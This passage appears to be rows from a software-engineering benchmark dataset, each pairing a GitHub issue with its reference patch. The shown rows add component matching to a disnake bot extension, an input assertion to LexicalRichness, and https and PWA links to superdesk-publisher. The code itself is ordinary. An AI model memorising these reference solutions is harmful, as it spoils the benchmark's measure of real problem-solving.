+ # User didn't supply select params, can still be accessed through inter.values; return.
+ if self.select_param is None:
+ return await super().__call__(inter, **converted)
+
+ # User did supply select params, convert inter.values and provide it to the param.
converted_values = await self.select_param.convert(
inter.values, inter=inter, converted=converted
)
return await super().__call__(inter, converted_values, **converted)
- async def build_select(
+ async def build_component(
self,
placeholder: t.Optional[str] = None,
min_values: t.Optional[int] = None,
@@ -380,38 +461,59 @@ async def build_select(
) -> disnake.ui.Select[t.Any]:
"""Build a :class:`disnake.ui.Select` that matches this listener.
- By default, this will create a Select with custom_id based on the custom_id parameters.
- All other parameters use the normal Select defaults, except this defaults max_options to
+ By default, this will create a select with custom_id based on the custom_id parameters.
+ All other parameters use the normal select defaults, except this defaults max_options to
``len(options)``. These values can be overwritten by setting the parameter default to a
- :func:`.SelectValue`, and call it with the parameters you wish to set on the TextInput.
+ :func:`.SelectValue`, and call it with the parameters you wish to set on the select.
Parameters
----------
**kwargs: Any
- The keyword-only parameters of the listener to store on the Select's custom_id.
+ The keyword-only parameters of the listener to store on the select's custom_id.
Returns:
:class:`disnake.ui.Select`
- The newly created Select.
+ The newly created select.
"""
- # We need the underlying `inspect.Parameter` here...
- param = self.select_param.param
+ if self.select_param:
+ # We need the underlying `inspect.Parameter` here...
+ param = self.select_param.param
- # Parse options from `typing.Literal` if none were provided.
- if options is None and types_.get_origin(param.annotation) is t.Literal:
- options = [str(arg) for arg in types_.get_args(param.annotation)]
+ # Parse options from `typing.Literal` if none were provided.
+ if options is None and types_.get_origin(param.annotation) is t.Literal:
+ options = [str(arg) for arg in types_.get_args(param.annotation)]
- # Get or create the parameter's SelectValue and .
- if not isinstance(select_value := param.default, params._SelectValue):
- select_value = params._SelectValue()
+ return self.reference.with_overrides(
+ placeholder=placeholder,
+ min_values=min_values,
+ max_values=max_values,
+ options=options,
+ disabled=disabled,
+ custom_id=await self.build_custom_id(*args, **kwargs),
+ ).as_component(disnake.ui.Select[t.Any])
- return select_value.with_overrides(
+ @deprecation.deprecated("build_component")
+ async def build_select(
+ self,
+ placeholder: t.Optional[str] = None,
+ min_values: t.Optional[int] = None,
+ max_values: t.Optional[int] = None,
+ options: t.Union[t.List[disnake.SelectOption], t.List[str], t.Dict[str, str], None] = None,
+ disabled: t.Optional[bool] = None,
+ *args: P.args,
+ **kwargs: P.kwargs,
+ ) -> disnake.ui.Select[t.Any]:
+ return await self.build_component(
placeholder=placeholder,
min_values=min_values,
max_values=max_values,
options=options,
disabled=disabled,
- ).build(custom_id=await self.build_custom_id(*args, **kwargs))
+ *args,
+ **kwargs,
+ )
+
+ build_select.__doc__ = build_component.__doc__
def select_listener(
@@ -419,7 +521,8 @@ def select_listener(
regex: t.Union[str, t.Pattern[str], None] = None,
sep: str = ":",
bot: t.Optional[commands.Bot] = None,
-) -> t.Callable[[SelectListenerCallback[ParentT, P, T]], SelectListener[P, T],]:
+ reference: t.Optional[SelectReference] = None,
+) -> t.Callable[[SelectListenerCallback[ParentT, P, T]], SelectListener[P, T]]:
"""Create a new :class:`SelectListener` from a decorated function. The :class:`SelectListener`
will take care of regex-matching and persistent data stored in the `custom_id` of the
:class:`disnake.ui.Select`.
@@ -457,7 +560,7 @@ def select_listener(
def wrapper(
func: SelectListenerCallback[ParentT, P, T],
) -> SelectListener[P, T]:
- listener = SelectListener[P, T](func, regex=regex, sep=sep)
+ listener = SelectListener[P, T](func, regex=regex, sep=sep, reference=reference)
if bot is not None:
bot.add_listener(listener, types_.ListenerType.SELECT)
@@ -476,29 +579,15 @@ class ModalListener(abc.BaseListener[P, T, disnake.ModalInteraction]):
converted to match the type annotations of these parameters.
"""
- def __new__(
- cls: t.Type[ListenerT],
- func: ModalListenerCallback[ParentT, P, T],
- **kwargs: t.Any,
- ) -> ListenerT:
- return super().__new__(cls, func, **kwargs)
-
def __init__(
self,
- func: ModalListenerCallback[ParentT, P, T],
+ callback: ModalListenerCallback[ParentT, P, T],
*,
+ name: t.Optional[str] = None,
regex: t.Union[str, t.Pattern[str], None] = None,
sep: str = ":",
) -> None:
- self._signature = commands.params.signature(func) # pyright: ignore
- if regex:
- self.regex = utils.ensure_compiled(regex)
- self.id_spec = utils.id_spec_from_regex(self.regex)
- self.sep = None
- else:
- self.regex = None
- self.id_spec = utils.id_spec_from_signature(self.__name__, sep, self._signature)
- self.sep = sep
+ super().__init__(callback, name=name, regex=regex, sep=sep)
special_params, listener_params = utils.extract_listener_params(self._signature)
@@ -548,6 +637,9 @@ async def __call__( # pyright: ignore
except ValueError:
return
+ if not await utils.assert_all_checks(self.checks, inter):
+ return
+
converted: t.Dict[str, t.Any] = {}
for param, arg in zip(self.params, custom_id_params):
converted[param.name] = await param.convert(
@@ -566,7 +658,7 @@ async def __call__( # pyright: ignore
return await super().__call__(inter, **converted)
- async def build_modal( # TODO: Update with new ModalValue functionality.
+ async def build_component( # TODO: Update with new ModalValue functionality.
self,
title: str,
components: t.Optional[t.List[disnake.ui.TextInput]] = None, # TODO: Disnake 2.6 typing.
@@ -647,7 +739,7 @@ def modal_listener(
regex: t.Union[str, t.Pattern[str], None] = None,
sep: str = ":",
bot: t.Optional[commands.Bot] = None,
-) -> t.Callable[[ModalListenerCallback[ParentT, P, T]], ModalListener[P, T],]:
+) -> t.Callable[[ModalListenerCallback[ParentT, P, T]], ModalListener[P, T]]:
"""Create a new :class:`ModalListener` from a decorated function. The ModalListener will take
care of regex-matching and persistent data stored in the custom_id of the :class:`disnake.ui.Modal`.
@@ -715,3 +807,168 @@ def wrapper(
return listener
return wrapper
+
+
[email protected]
+def match_component(
+ component: t.Union[disnake.Button, disnake.ui.Button[t.Any]],
+ /,
+ *,
+ bot: t.Optional[commands.Bot] = None,
+) -> t.Callable[[ButtonListenerCallback[ParentT, P, T]], ButtonListener[P, T]]:
+ ...
+
+
[email protected]
+def match_component(
+ *,
+ component_type: t.Literal[disnake.ComponentType.button],
+ style: disnake.ButtonStyle = ...,
+ custom_id: str = ...,
+ disabled: bool = ...,
+ label: str = ...,
+ emoji: t.Union[disnake.PartialEmoji, disnake.Emoji, str] = ...,
+ bot: t.Optional[commands.Bot] = None,
+) -> t.Callable[[ButtonListenerCallback[ParentT, P, T]], ButtonListener[P, T]]:
+ ...
+
+
[email protected]
+def match_component(
+ component: t.Union[disnake.SelectMenu, disnake.ui.Select[t.Any]],
+ /,
+ *,
+ bot: t.Optional[commands.Bot] = None,
+) -> t.Callable[[SelectListenerCallback[ParentT, P, T]], SelectListener[P, T]]:
+ ...
+
+
[email protected]
+def match_component(
+ *,
+ component_type: t.Literal[disnake.ComponentType.select],
+ custom_id: str = ...,
+ placeholder: str = ...,
+ min_values: int = ...,
+ max_values: int = ...,
+ disabled: bool = ...,
+ options: t.List[disnake.SelectOption] = ...,
+ label: str = ...,
+ bot: t.Optional[commands.Bot] = None,
+) -> t.Callable[[SelectListenerCallback[ParentT, P, T]], SelectListener[P, T]]:
+ ...
+
+
+def match_component(
+ component: t.Optional[
+ t.Union[
+ disnake.Button,
+ disnake.ui.Button[t.Any],
+ disnake.SelectMenu,
+ disnake.ui.Select[t.Any],
+ ]
+ ] = None,
+ /,
+ *,
+ component_type: t.Optional[disnake.ComponentType] = None,
+ bot: t.Optional[commands.Bot] = None,
+ **kwargs: t.Any,
+) -> t.Callable[[t.Callable[..., t.Any]], ComponentListener]:
+ """Create a listener that listens for components that match the provided one.
+ A component can be provided either as an actual component, or as keyword-arguments with the
+ necessary information to build a component. Note that these are mutually exclusive.
+
+ This will generate a fully qualified listener based on the parameters entered. From there, one
+ can easily create matching components using the `~.build_component` methods.
+
+ Parameters
+ ----------
+ component: Union[:class:`disnake.Button`, :class:`disnake.ui.Button`, :class:`disnake.SelectMenu`, :class:`disnake.ui.Select`]
+ The component to match. As this passes a fully qualified component with all its
+ parameters set, this will make the listener look for an *exact* match of the passed
+ component.
+
+ Note that passing components is mutually exclusive with passing any keyword arguments
+ outside of `bot`.
+ component_type: :class:`disnake.ComponentType`
+ The type of component the listener is for. If using keyword args to provide a component to
+ match, this parameter is required.
+
+ Note that passing keyword arguments is mutually exclusive with passing a concrete component.
+ **kwargs: Any
+ Any other parameters that can be passed to the desired component type.
+ bot: Optional[:class:`commands.Bot`]
+ Useful when defining this listener in the main file. This can be used to automatically
+ register the listener to the bot. This is automatically taken care of inside of cogs.
+
+ Raises
+ ------
+ ValueError
+ Either both or neither of `component` and `component_type` were passed. Please make sure
+ to pass strictly one of these parameters. Furthermore, make sure to not combine a
+ concrete component with further kwargs.
+ TypeError
+ The passed component is not of compatible type, or the passed component_type is not
+ among `disnake.ComponentType.button` or `disnake.ComponentType.select`
+
+ Returns
+ -------
+ Union[:class:`ButtonListener`, :class:`SelectListener`]
+ A component listener with a component matching check registered. The listener will match
+ the type of the provided component.
+ """
+ if component is not None and (component_type is not None or kwargs):
+ raise ValueError(
+ "Please provide exactly one of `component` or `component_type` and its kwargs."
+ )
+
+ if component is not None:
+ if isinstance(component, (disnake.Button, disnake.ui.Button)):
+ listener_class = ButtonListener
+ elif isinstance(
+ component, (disnake.SelectMenu, disnake.ui.Select)
+ ): # pyright: ignore # Valid redundancy imo.
+ listener_class = SelectListener
+ else:
+ raise TypeError(
+ "Expected `component` to be an instance of disnake.Button, disnake.ui.Button, "
+ f"disnake.SelectMenu or disnake.ui.Select; got {type(component).__name__}."
+ )
+
+ elif component_type is not None:
+ if component_type is disnake.ComponentType.button:
+ listener_class = ButtonListener
+ elif component_type is disnake.ComponentType.select:
+ listener_class = SelectListener
+ else:
+ raise TypeError(
+ "Expected `component_type` to be either disnake.ComponentType.button or "
+ f"disnake.ComponentType.select; got {component_type.name}."
+ )
+
+ else:
+ raise ValueError(
+ "Please provide exactly one of `component` or `component_type` and its kwargs."
+ )
+
+ if component_type:
+ kwargs["type"] = component_type
+
+ def wrapper(callback: t.Callable[..., t.Any]) -> ComponentListener:
+ if component is not None:
+ reference = types_.AbstractComponent.from_component(component)
+ name = component.custom_id
+ else:
+ reference = types_.AbstractComponent(**kwargs)
+ name = kwargs.get("custom_id")
+
+ listener = listener_class(callback, name=name, reference=reference)
+ listener.add_check(utils.build_component_matching_check(reference))
+
+ if bot:
+ for listener_type in listener.__cog_listener_names__:
+ bot.add_listener(listener, listener_type)
+
+ return listener
+
+ return wrapper
diff --git a/disnake_ext_components/params.py b/disnake_ext_components/params.py
index 010a4f5..d0f366c 100644
--- a/disnake_ext_components/params.py
+++ b/disnake_ext_components/params.py
@@ -48,6 +48,7 @@
disnake.abc.GuildChannel: patterns.SNOWFLAKE,
disnake.Guild: patterns.SNOWFLAKE,
disnake.Message: patterns.SNOWFLAKE,
+ disnake.Permissions: patterns.STRICTINT,
# disnake.Emoji: ID, # temporarily(?) disabled
# fmt: on
}
@@ -429,7 +430,6 @@ def with_overrides(
options: t.Union[t.List[disnake.SelectOption], t.List[str], t.Dict[str, str], None] = None,
disabled: t.Optional[bool] = None,
) -> _SelectValue:
- print(options)
return type(self)(
placeholder=self.placeholder if placeholder is None else placeholder,
min_values=self.min_values if min_values is None else min_values,
@@ -458,8 +458,9 @@ def SelectValue(
options: t.Union[t.List[disnake.SelectOption], t.List[str], t.Dict[str, str], None] = None,
disabled: bool = False,
) -> t.Any:
- return _SelectValue(
- placeholder,
+ return types_.AbstractComponent(
+ type=disnake.ComponentType.select,
+ placeholder=placeholder,
min_values=min_values,
max_values=max_values,
options=options,
diff --git a/disnake_ext_components/types_.py b/disnake_ext_components/types_.py
index cfb2ea9..be578fe 100644
--- a/disnake_ext_components/types_.py
+++ b/disnake_ext_components/types_.py
@@ -1,17 +1,17 @@
from __future__ import annotations
import enum
-import functools
import re
import sys
import typing as t
+import disnake
+
__all__ = [
"Annotated",
"get_args",
"get_origin",
"ListenerType",
- "partial",
"Converted",
]
@@ -20,33 +20,27 @@
_T_co = t.TypeVar("_T_co", covariant=True)
_T_contra = t.TypeVar("_T_contra", contravariant=True)
-MaybeAwaitable = t.Union[t.Awaitable[_T], _T]
+Coro = t.Coroutine[t.Any, t.Any, _T]
+MaybeCoro = t.Union[Coro[_T], _T]
MaybeSequence = t.Union[t.Sequence[_T], _T]
+InteractionT = t.TypeVar("InteractionT", disnake.MessageInteraction, disnake.ModalInteraction)
+MessageComponentT = t.TypeVar(
+ "MessageComponentT",
+ bound=t.Union[
+ disnake.ui.Button[t.Any],
+ disnake.ui.Select[t.Any],
+ ],
+)
+
+CheckCallback = t.Callable[[InteractionT], MaybeCoro[bool]]
+CheckT = t.TypeVar("CheckT", bound=CheckCallback[t.Any])
if sys.version_info >= (3, 10):
from typing import Annotated, get_args, get_origin
else:
from typing_extensions import Annotated, get_args, get_origin
-if sys.version_info >= (3, 9):
- partial = functools.partial
-
-else:
-
- class partial(functools.partial, t.Generic[_T]): # pyright: ignore
- """This intermediary class is needed to have type-checking work properly between Python
- versions 3.8 through 3.10. Since `functools.partial` became a generic in Python 3.9,
- type-checkers expect this in versions 3.9 and up, whereas it would raise in version 3.8.
-
- To get around this, for version 3.8 specifically, we create this intermediary class to
- make `functools.partial` behave like its version 3.9+ counterpart, where the return type
- can be set as the generic type specifier.
- """
-
- def __call__(self, *args: t.Any, **kwargs: t.Any) -> _T:
- return t.cast(_T, super().__call__(*args, **kwargs))
-
class ListenerType(str, enum.Enum):
"""A string enum that contains all listener types."""
@@ -130,13 +124,13 @@ async def listener(
# TODO: Should probably rename these.
- converter_to: t.Callable[..., MaybeAwaitable[t.Any]]
+ converter_to: t.Callable[..., MaybeCoro[t.Any]]
"""The custom converter function used to convert input from :class:`str` to the return type
of the function. Make sure that this function can convert anything matched by the provided
regex pattern.
"""
- converter_from: t.Callable[..., MaybeAwaitable[t.Any]]
+ converter_from: t.Callable[..., MaybeCoro[t.Any]]
"""The custom converter function used to convert back to :class:`str`. This is used to ensure
the value is inserted into the custom_id in such a manner that it can be matched anew. Make
sure that whatever is returned by this function can be matched by the provided regex pattern.
@@ -145,8 +139,8 @@ async def listener(
def __init__(
self,
regex: t.Pattern[str],
- converter_to: t.Callable[..., MaybeAwaitable[t.Any]],
- converter_from: t.Callable[..., MaybeAwaitable[t.Any]],
+ converter_to: t.Callable[..., MaybeCoro[t.Any]],
+ converter_from: t.Callable[..., MaybeCoro[t.Any]],
):
self.regex = regex
self.converter_to = converter_to
@@ -158,3 +152,124 @@ def __repr__(self):
f"converter_to={self.converter_to.__name__}(), "
f"converter_from={self.converter_from.__name__}()]"
)
+
+
+class SelectOption(disnake.SelectOption):
+ __slots__ = ()
+
+ def __eq__(self, other: t.Any) -> bool:
+ if not isinstance(other, disnake.SelectOption):
+ return False
+
+ for slot in disnake.SelectOption.__slots__:
+ value = getattr(self, slot)
+ other_value = getattr(other, slot)
+
+ if value is disnake.utils.MISSING and other_value is not disnake.utils.MISSING:
+ return False
+
+ if other_value != value:
+ return False
+
+ return True
+
+ @classmethod
+ def _convert(cls, other: disnake.SelectOption):
+ return cls(**{slot: getattr(other, slot) for slot in disnake.SelectOption.__slots__})
+
+
+def _parse_select_options(
+ options: t.Union[t.List[disnake.SelectOption], t.List[str], t.Dict[str, str]]
+) -> t.List[SelectOption]:
+ # Had to yoink this from disnake as the `ui.select` module is shadowed by the decorator...
+ # Gave me the opportunity to work with custom SelectOptions that support comparison though.
+
+ if isinstance(options, dict):
+ return [SelectOption(label=key, value=val) for key, val in options.items()]
+
+ return [
+ SelectOption._convert(opt)
+ if isinstance(opt, disnake.SelectOption)
+ else SelectOption(label=opt)
+ for opt in options
+ ]
+
+
+class AbstractComponent:
+ __sentinel = object()
+
+ __slots__: t.Tuple[t.Any] = tuple(
+ set(disnake.Component.__slots__)
+ | set(disnake.Button.__slots__)
+ | set(disnake.SelectMenu.__slots__)
+ )
+
+ def __init__(self, **kwargs: t.Any):
+ # Handle special cases...
+ if "emoji" in kwargs and isinstance(emoji := kwargs["emoji"], str):
+ kwargs["emoji"] = disnake.PartialEmoji.from_str(emoji)
+
+ if "options" in kwargs:
+ kwargs["options"] = _parse_select_options(kwargs["options"] or [])
+
+ for k, v in kwargs.items():
+ setattr(self, k, v)
+
+ @classmethod
+ def from_component(
+ cls,
+ component: t.Union[
+ disnake.Button,
+ disnake.ui.Button[t.Any],
+ disnake.SelectMenu,
+ disnake.ui.Select[t.Any],
+ ],
+ ) -> AbstractComponent:
+ self = cls()
+ for slot in cls.__slots__:
+ value = getattr(component, slot, cls.__sentinel)
+ if value is not cls.__sentinel:
+ setattr(self, slot, value)
+
+ # Ensure custom SelectOptions
+ options: t.Any = getattr(self, "options", self.__sentinel)
+ if options is not self.__sentinel:
+ setattr(self, "options", _parse_select_options(options))
+
+ return self
+
+ def __iter__(self) -> t.Generator[t.Tuple[str, t.Any], None, None]:
+ for slot in self.__slots__:
+ value = getattr(self, slot, self.__sentinel)
+ if value is not self.__sentinel:
+ yield slot, value
+
+ def __eq__(self, other: t.Union[disnake.Button, disnake.SelectMenu]) -> bool: # type: ignore
+ return not any(value != getattr(other, slot, self.__sentinel) for slot, value in self)
+
+ def __repr__(self):
+ return f"AbstractComponent({', '.join(f'{k}={v}' for k, v in self)})"
+
+ def get(self, key: str) -> t.Optional[t.Any]:
+ return getattr(self, key, None)
+
+ def copy(self) -> AbstractComponent:
+ return AbstractComponent(**dict(self))
+
+ def with_overrides(self, **kwargs: t.Any):
+ copy = self.copy()
+ copy.__init__(**{k: v for k, v in kwargs.items() if v is not None})
+ return copy
+
+ def as_component(self, template: t.Type[MessageComponentT]) -> MessageComponentT:
+ kwargs = dict(self)
+ type_ = kwargs.pop("type", self.__sentinel)
+
+ component = template(**kwargs)
+ if component.type is not type_:
+ raise ValueError(
+ f"This AbstractComponent is of type {type_}, "
+ f"and is therefore incompatible with {template.__name__}."
+ )
+
+ return component
diff --git a/disnake_ext_components/utils.py b/disnake_ext_components/utils.py
index 80982ad..2023343 100644
--- a/disnake_ext_components/utils.py
+++ b/disnake_ext_components/utils.py
@@ -5,6 +5,8 @@
import disnake
from disnake.ext import commands
+from . import types_
+
__all__ = [
"id_spec_from_signature",
"id_spec_from_regex",
@@ -22,6 +24,11 @@ def id_spec_from_signature(name: str, sep: str, signature: inspect.Signature) ->
The name of the listener function to which the signature belongs.
signature: :class:`inspect.Signature`
The function signature of the listener function.
+
+ Returns
+ -------
+ :class:`str`
+ The custom_id spec that was built from the provided function signature.
"""
_, custom_id_params = extract_listener_params(signature)
if not custom_id_params:
@@ -38,6 +45,11 @@ def id_spec_from_regex(regex: t.Pattern[str]) -> str:
----------
regex: :class:`re.Pattern`
The regex pattern that is to be deconstructed.
+
+ Returns
+ -------
+ :class:`str`
+ The custom_id spec that was extracted from the regex pattern.
"""
return re.sub(r"\(\?P<(.+?)>.*?\)", lambda m: f"{{{m[1]}}}", regex.pattern)
@@ -71,7 +83,7 @@ def extract_listener_params(
- The second tuple contains all remaining parameters, which are parsed from the `custom_id`.
"""
param_iter = iter(signature.parameters.values())
- for param in param_iter:
+ for pos, param in enumerate(param_iter):
if commands.params.issubclass_(param.annotation, disnake.Interaction):
break
else:
@@ -80,6 +92,9 @@ def extract_listener_params(
"Please make sure the interaction parameter is properly annotated in the listener."
)
+ if pos > 1:
+ raise TypeError("The listener callback's `self` parameter must be the first parameter.")
+
special_params: t.List[inspect.Parameter] = []
for param in param_iter:
@@ -109,5 +124,83 @@ def ensure_compiled(
compiled, it is returned as-is.
flags: :class:`re.RegexFlag`
Any flags to apply to compilation. By default this has the same behaviour as `re.compile`.
+
+ Returns
+ -------
+ :class:`re.Pattern`
+ The compiled regex pattern.
"""
return re.compile(pattern, flags) if isinstance(pattern, str) else pattern
+
+
+async def assert_all_checks(
+ checks: t.Sequence[types_.CheckCallback[types_.InteractionT]],
+ inter: types_.InteractionT,
+) -> bool:
+ """Ensure all checks for a given listener pass.
+
+ Parameters
+ ----------
+ checks: Sequence[Callable[[:class:`disnake.Interaction`], MaybeCoro[:class:`bool`]]]
+ The checks that should be run for the listener.
+ inter: :class:`disnake.Interaction`
+ The interaction to supply to the checks.
+
+ Returns
+ -------
+ :class:`bool`
+ Whether all checks succeeded or not.
+ """
+ for check in checks:
+ result = check(inter)
+ if inspect.isawaitable(result):
+ result = await result
+
+ if result is False:
+ return False
+
+ return True
+
+
+def build_component_matching_check(
+ component: t.Union[
+ disnake.ui.Button[t.Any],
+ disnake.ui.Select[t.Any],
+ types_.AbstractComponent,
+ None,
+ ] = None,
+ /,
+ **kwargs: t.Any,
+) -> t.Callable[[disnake.MessageInteraction], bool]:
+ """Build a check function to compare a component with the incoming interaction's component.
+ Takes either a component, or kwargs that build a component. A component will look for an exact
+ match, whereas kwargs will look for a "superset" of the provided kwargs.
+
+ Parameters
+ ----------
+ component: Union[:class:`disnake.ui.Button`, :class:`disnake.ui.Select` :class:`.types_.AbstractComponent`]
+ The component to match.
+ kwargs: Any
+ The parameters that make up a (partial) component.
+
+ Returns
+ -------
+ Callable[[:class:`disnake.MessageInteraction`], :class:`bool`]
+ The check function. Takes a message interaction and returns a bool depending on whether the
+ component matches.
+ """ # noqa: E501
+ if component is not None:
+ if kwargs:
+ raise ValueError("Please provide either a component or kwargs.")
+
+ if isinstance(component, types_.AbstractComponent):
+ check_component = component
+ else:
+ check_component = types_.AbstractComponent.from_component(component)
+ else:
+ check_component = types_.AbstractComponent(**kwargs)
+
+ def check(inter: disnake.MessageInteraction) -> bool:
+ return check_component == inter.component
+
+ return check
diff --git a/examples/component_matching.py b/examples/component_matching.py
new file mode 100644
index 0000000..37a12b0
--- /dev/null
+++ b/examples/component_matching.py
@@ -0,0 +1,35 @@
+import disnake
+from disnake.ext import commands, components
+
+
+class ComponentMatchingExample(commands.Cog):
+ def __init__(self, bot: commands.Bot):
+ self.bot = bot
+
+ @components.match_component(component_type=disnake.ComponentType.button, label="simple_delete")
+ async def simple_delete_listener(self, inter: disnake.MessageInteraction):
+ """Check if the author has sufficient permissions. If so, delete the message."""
+ await inter.response.defer()
+ print(inter.component.custom_id)
+
+ if (
+ # DMs...
+ isinstance(inter.channel, disnake.PartialMessageable)
+ or isinstance(inter.author, disnake.User)
+ # Author has manage_message permissions...
+ or inter.channel.permissions_for(inter.author).manage_messages
+ ):
+ await inter.delete_original_message()
+ return
+
+ await inter.followup.send("You are not allowed to take this action!", ephemeral=True)
+
+ @commands.slash_command()
+ async def send_a_thing(self, inter: disnake.CommandInteraction):
+ await inter.response.send_message(
+ "Here's a thing.", components=await self.simple_delete_listener.build_component()
+ )
+
+
+def setup(bot: commands.Bot):
+ bot.add_cog(ComponentMatchingExample(bot))
| component matching to callbacks
## Description
A way to assign a callback to always listen for components matching certain attributes.
eg, a button the button colour and custom_id, and the fact that it *is* a button
```py
@components.match_component(disnake.Button(custom_id="button!", color="..."))
```
```py
@components.match_component(component_type=disnake.ComponentType.button, custom_id="...")
```
This effectively allows a button callback.
To make this even nicer, using the decorated function could have a method or function attached that creates a component with the specified parameters, as that would allow sending the created and matching button or select quite easily.
| 2022-07-14T22:41:21 | 0.0 | [] | [] |
|||
LSYS/LexicalRichness | LSYS__LexicalRichness-38 | f0087bce069eb953a8e35fa2599c7c35f766dcce | diff --git a/lexicalrichness/lexicalrichness.py b/lexicalrichness/lexicalrichness.py
index 69ffb65..0baa7d9 100644
--- a/lexicalrichness/lexicalrichness.py
+++ b/lexicalrichness/lexicalrichness.py
@@ -181,6 +181,7 @@ def __init__(self, text, preprocessor=preprocess, tokenizer=tokenize):
if self.tokenizer:
self.wordlist = self.tokenizer(text)
else:
+ assert type(text)==list, "If tokenizer is None, then input should be a list of words."
self.wordlist = text
self.words = len(self.wordlist)
diff --git a/setup.py b/setup.py
index 384a951..9b7e862 100644
--- a/setup.py
+++ b/setup.py
@@ -40,5 +40,5 @@
packages=find_packages(include=['lexicalrichness']),
url='https://github.com/LSYS/lexicalrichness',
download_url='https://github.com/LSYS/LexicalRichness/archive/refs/tags/v0.1.9.tar.gz',
- version='0.1.9'
+ version='0.1.10'
)
| Disallow string input when tokenizer is set to None
For custom NLP pipelines, disallow string input when tokenizer is set to None.
Assert that input is a list of words instead of a string.
Disallow string input when tokenizer is set to None
For custom NLP pipelines, disallow string input when tokenizer is set to None.
Assert that input is a list of words instead of a string.
| 2022-08-20T08:09:12 | 0.0 | [] | [] |
|||
superdesk/superdesk-publisher | superdesk__superdesk-publisher-326 | 28558110a7ec6e8863ecd11fda7446970b9a5edd | diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml
index e0ff0d30..4e095a88 100644
--- a/.github/workflows/ci.yaml
+++ b/.github/workflows/ci.yaml
@@ -8,7 +8,7 @@ jobs:
strategy:
matrix:
- node-version: [10.x, 12.x, 14.x]
+ node-version: [14.x]
steps:
- name: Set Timezone
diff --git a/client/components/Analytics/ArticleItem.jsx b/client/components/Analytics/ArticleItem.jsx
index e70634a9..5d34e85f 100644
--- a/client/components/Analytics/ArticleItem.jsx
+++ b/client/components/Analytics/ArticleItem.jsx
@@ -44,12 +44,12 @@ const ArticleItem = ({ item, style }) => {
target="_blank"
href={
item.tenant.subdomain
- ? "http://" +
+ ? "https://" +
item.tenant.subdomain +
"." +
item.tenant.domain_name +
item._links.online.href
- : "http://" + item.tenant.domain_name + item._links.online.href
+ : "https://" + item.tenant.domain_name + item._links.online.href
}
>
<i className="icon-external" />
@@ -71,7 +71,7 @@ const ArticleItem = ({ item, style }) => {
ArticleItem.propTypes = {
item: PropTypes.object.isRequired,
- style: PropTypes.object.isRequired
+ style: PropTypes.object.isRequired,
};
export default ArticleItem;
diff --git a/client/components/ContentLists/ListCard.jsx b/client/components/ContentLists/ListCard.jsx
index 4c175d22..ec7bcb55 100644
--- a/client/components/ContentLists/ListCard.jsx
+++ b/client/components/ContentLists/ListCard.jsx
@@ -39,6 +39,9 @@ class ListCard extends React.Component {
? helpers.getUpdatedValues(this.state.list, this.props.list)
: { ...this.state.list };
+ delete list.updated_at;
+ delete list.latest_items;
+
this.props.publisher
.manageList(list, this.state.list.id)
.then((res) => {
@@ -122,6 +125,16 @@ class ListCard extends React.Component {
onChange={this.handleInputChange}
/>
</div>
+ <div className="field">
+ <label htmlFor="listLimit">Description</label>
+ <input
+ type="text"
+ className="line-input"
+ value={this.state.list.description}
+ name="description"
+ onChange={this.handleInputChange}
+ />
+ </div>
<div className="field">
<label htmlFor="listCacheLifeTime">cache lifetime</label>
<input
diff --git a/client/components/Dashboard/Tenant.jsx b/client/components/Dashboard/Tenant.jsx
index c22d5843..582a9fa3 100644
--- a/client/components/Dashboard/Tenant.jsx
+++ b/client/components/Dashboard/Tenant.jsx
@@ -9,11 +9,13 @@ const Tenant = ({ tenant }) => {
<a
target="_blank"
href={
- tenant.output_channel
+ tenant.pwa_config && tenant.pwa_config.url
+ ? tenant.pwa_config.url
+ : tenant.output_channel
? tenant.output_channel.config.url
: tenant.subdomain
- ? "http://" + tenant.subdomain + "." + tenant.domain_name
- : "http://" + tenant.domain_name
+ ? "https://" + tenant.subdomain + "." + tenant.domain_name
+ : "https://" + tenant.domain_name
}
flow="down"
>
@@ -21,6 +23,9 @@ const Tenant = ({ tenant }) => {
<i className="icon-external"></i>
</a>
</h3>
+ {tenant.pwa_config && tenant.pwa_config.url && (
+ <span className="sp-logo-pwa"></span>
+ )}
</div>
<div className="sd-card sd-card--flex-grow">
<div className="dashboard-content-header sd-shadow--z1">
@@ -65,7 +70,7 @@ const Tenant = ({ tenant }) => {
className="sd-card__content"
style={{
maxHeight: "210px",
- overflowY: "auto"
+ overflowY: "auto",
}}
>
<ul className="sd-card__content-list">
@@ -82,7 +87,7 @@ const Tenant = ({ tenant }) => {
<p className="panel-info__description"> </p>
</div>
) : (
- tenant.content_lists.map(list => (
+ tenant.content_lists.map((list) => (
<li
key={list.name + list.id}
className="sd-card__content-list-item sd-card__content-list-item--no-padding"
@@ -107,7 +112,7 @@ const Tenant = ({ tenant }) => {
};
Tenant.propTypes = {
- tenant: PropTypes.object.isRequired
+ tenant: PropTypes.object.isRequired,
};
export default Tenant;
diff --git a/client/components/Output/ArticleItem.jsx b/client/components/Output/ArticleItem.jsx
index b9d4eb6f..f04f9346 100644
--- a/client/components/Output/ArticleItem.jsx
+++ b/client/components/Output/ArticleItem.jsx
@@ -149,14 +149,19 @@ const ArticleItem = ({ item, style, onRemove }) => {
key={`articlestatuslabel_${index}_${article.id}`}
article={article}
url={
- article.tenant
+ article.tenant &&
+ article.tenant.pwa_config &&
+ article.tenant.pwa_config.url
+ ? article.tenant.pwa_config.url +
+ article._links.online.href
+ : article.tenant
? article.tenant.subdomain
- ? "http://" +
+ ? "https://" +
article.tenant.subdomain +
"." +
article.tenant.domain_name +
article._links.online.href
- : "http://" +
+ : "https://" +
article.tenant.domain_name +
article._links.online.href
: null
diff --git a/client/components/Output/Listing.jsx b/client/components/Output/Listing.jsx
index f8bb5073..f8d11a5c 100644
--- a/client/components/Output/Listing.jsx
+++ b/client/components/Output/Listing.jsx
@@ -216,10 +216,18 @@ class Listing extends React.Component {
item.page_views_count = helpers.countPageViews(item.articles);
item.articles.forEach((item) => {
if (item.route && item.status == "published" && item.tenant) {
- let tenantUrl = item.tenant.subdomain
- ? item.tenant.subdomain + "." + item.tenant.domain_name
- : item.tenant.domain_name;
- item.live_url = "http://" + tenantUrl + item._links.online.href;
+ let tenantUrl =
+ item.tenant &&
+ item.tenant.pwa_config &&
+ item.tenant.pwa_config.url
+ ? item.tenant.pwa_config.url
+ : item.tenant.subdomain
+ ? "https://" +
+ item.tenant.subdomain +
+ "." +
+ item.tenant.domain_name
+ : "https://" + item.tenant.domain_name;
+ item.live_url = tenantUrl + item._links.online.href;
}
});
});
diff --git a/client/components/Output/PreviewPane.jsx b/client/components/Output/PreviewPane.jsx
index ff35f472..dedf457b 100644
--- a/client/components/Output/PreviewPane.jsx
